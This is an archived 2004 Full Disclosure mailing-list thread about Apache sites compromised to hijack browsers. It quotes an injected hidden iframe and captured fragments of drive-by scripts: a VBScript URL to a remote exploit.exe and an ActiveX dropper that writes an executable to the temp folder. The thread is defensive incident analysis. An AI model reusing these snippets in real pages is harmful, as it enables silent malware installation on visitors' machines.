|
Full Disclosure
mailing list archives
Re: browser hijack by apache sites
From: D B <geggam692000 () yahoo com>
Date: Sun, 23 May 2004 10:16:55 -0700 (PDT)
using konqueror i got it to download these two files
Filename 1: 2DimensionOfExploitsEnc.php
<html>
<script language=vbs>
szURL = "http://www.pizdato.biz/acc1/exploit.exe";
</script>
<script language="VBScript.Encode">
Filename 2: object2.cfm
<script language=jscript>
self.moveTo(5000,5000);
self.close();
fs=new ActiveXObject("Scripting.FileSystemObject");
fname=fs.GetSpecialFolder(2)+'\\q381275.exe';
a=fs.CreateTextFile(fname,true);
a.Write('MZ');
a.Close();
a=fs.OpenTextFile(fname,8,false,true);
Message: 1
From: Filbert <filbert () pandora be>
Reply-To: filbert () pandora be
To: full-disclosure () lists netsys com
Date: Sun, 23 May 2004 15:19:30 +0200
Organization: Hell
Subject: [Full-disclosure] browser hijack by apache
sites
Hi,
This is the second time this weekend that I've been
warned of an apache
site
on a Linux server were a line of code was added to
redirect browsers to
porn
sites.
First was the site of a Belgian political party.
Second came today, and
as of
writing this it's still there. The admin was informed
so it can be gone
soon.
hxxp://www.previsit.com/carrefour/nl/ <- hxxp must
changed to http
IE users do NOT click.
the code added at the bottom is:
<iframe SRC="http://www.b00gle.com/fa/?d=get"; WIDTH=1
HEIGHT=1></iframe></body>
anyone seen this before? What vulnerability is
exploited here? FP?
Thx,
Filb.
__________________________________
Do you Yahoo!?
Yahoo! Domains Claim yours for only $14.70/year
http://smallbusiness.promotions.yahoo.com/offer
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
 By Date 
By Thread
Current thread:
| 
Intro
